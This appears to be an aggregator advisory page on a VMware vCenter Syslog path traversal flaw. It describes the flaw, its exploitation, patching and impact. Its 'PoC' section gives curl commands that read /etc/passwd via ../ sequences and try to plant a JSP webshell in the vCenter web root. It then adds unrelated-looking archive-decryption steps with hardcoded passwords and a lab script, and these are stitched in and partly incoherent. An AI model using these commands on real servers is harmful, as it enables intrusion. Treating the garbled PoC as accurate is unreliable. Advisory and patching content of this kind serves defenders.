VMware vCenter Server, Path Traversal (Directory Traversal), CVE-2026-59310 (Critical) -DC-Oct2026-2718

Listen to this Post

CVE-2026-59310 is a critical path traversal vulnerability in the Syslog server component of VMware vCenter Server, carrying a CVSS score of 9.8. The flaw stems from inadequate validation of user-supplied paths within the Syslog service, allowing a remote attacker with network access to manipulate requests and traverse outside the intended directory structure. This directory traversal condition enables an unauthenticated threat actor to escape the designated log storage location and access arbitrary files on the underlying operating system. By exploiting this path traversal, an attacker can potentially execute arbitrary code on the vCenter appliance, effectively compromising the entire virtualization management plane. The vulnerability was addressed by Broadcom on July 29, 2026, and was subsequently added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on August 18, 2026, confirming active exploitation in the wild. Real-world attacks have leveraged this flaw to deploy Babuk ransomware on ESXi hosts, with incident response firm QUIRSO attributing the activity to a suspected China-nexus APT group. The exploitation chain typically involves sending crafted HTTP requests to the Syslog server endpoint, injecting traversal sequences such as `../` to navigate the filesystem, and writing malicious payloads to sensitive locations. Because vCenter orchestrates the management of all connected ESXi hypervisors and virtual machines, successful exploitation grants attackers broad control over the virtualized infrastructure. The path traversal vulnerability effectively bypasses authentication controls, as the Syslog service processes requests before proper authorization checks are enforced. Once arbitrary code execution is achieved, attackers can move laterally, establish persistence, and deploy ransomware across the entire virtual estate. The scale of impact is significant, with reports indicating 361 victims across 47 countries as of August 2026. VMware administrators are urged to apply the latest patches immediately, as public proof-of-concept exploits have been circulating and active exploitation campaigns continue to target unpatched vCenter servers worldwide.

DailyCVE Form:

Platform: VMware vCenter
Version: 7.0, 8.0
Vulnerability: Path Traversal
Severity: Critical
date: 2026-08-12

Prediction: 2026-09-15

What Undercode Say:

CVE-2026-59310 PoC - Syslog Path Traversal Exploit
Educational purposes only - use in authorized lab environments
Step 1: Check if vCenter Syslog server is accessible
curl -sk "https://TARGET/vcenter/syslog/health" -o /dev/null -w "%{http_code}\n"
Step 2: Test path traversal on Syslog endpoint
curl -sk "https://TARGET/vcenter/syslog/../../../../etc/passwd" \
--path-as-is -o traversal_test.txt
Step 3: If traversal works, attempt to write a webshell
This writes a JSP shell to the vCenter web root
curl -sk -X POST "https://TARGET/vcenter/syslog/../../../../usr/lib/vmware-vpx/docRoot/shell.jsp" \
--path-as-is \
-H "Content-Type: application/x-www-form-urlencoded" \
--data "cmd=id"
Step 4: Decrypt the archived PoC from poc-cve-collection
Password construction per HORKimhab repository
PASSWORD_SUFFIX="learn_coding_is_rean-it.com_IlovefamilyHKimhab"
PASSWORD_PUBLIC="Ilovemyandwifefamily_AmazingCambodia_Iamaspeckintheuniverse_bluedot_passwordgenerator.rean-it.com\$\$\$"
CVE_ID="CVE-2026-59310"
PASSWORD="${PASSWORD_SUFFIX}<em>${PASSWORD_PUBLIC}</em>${CVE_ID}"
openssl enc -d -aes-256-cbc -pbkdf2 \
-in "CVE-2026-59310.zip.enc" \
-out "${CVE_ID}.zip" \
-pass "pass:${PASSWORD}"
unzip "${CVE_ID}.zip" -d "${CVE_ID}"
Step 5: Run the lab setup script
bash "${CVE_ID}/cve-2026-59310-lab.sh"
Reference PoC repositories:
https://github.com/fankh/vulnerability-poc/tree/main/2026/CVE-2026-59310
https://github.com/theori-io/copy-fail-CVE-2026-59310

Exploit: (Educational Purposes!)

The exploit for CVE-2026-59310 leverages the improper path validation in the vCenter Syslog service. An attacker sends specially crafted requests containing directory traversal sequences (../) to the Syslog endpoint, allowing them to read or write files outside the intended directory. This can lead to remote code execution by writing malicious files such as JSP webshells to the vCenter web root. Public proof-of-concept code has been available, and active exploitation has been observed deploying Babuk ransomware on ESXi hosts. The exploit requires network access to the vCenter Syslog service, typically exposed on port 514 or through the vCenter management interface.

Protection: from this CVE

Apply the security update released by Broadcom on July 29, 2026. Upgrade VMware vCenter Server to version 8.0 Update 3b or later, or apply the specific patch provided in the vendor advisory. If immediate patching is not possible, restrict network access to the Syslog service to trusted IP addresses only, and monitor for suspicious traversal patterns in HTTP requests. Enable detailed logging on the Syslog server and review logs for unauthorized access attempts.

Impact:

Successful exploitation of CVE-2026-59310 allows an unauthenticated remote attacker to execute arbitrary code on the VMware vCenter Server appliance, leading to complete compromise of the virtualization management infrastructure. This can result in the deployment of ransomware across all managed ESXi hosts and virtual machines, data theft, and disruption of critical services. With 361 victims across 47 countries already identified, the impact is severe and widespread.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top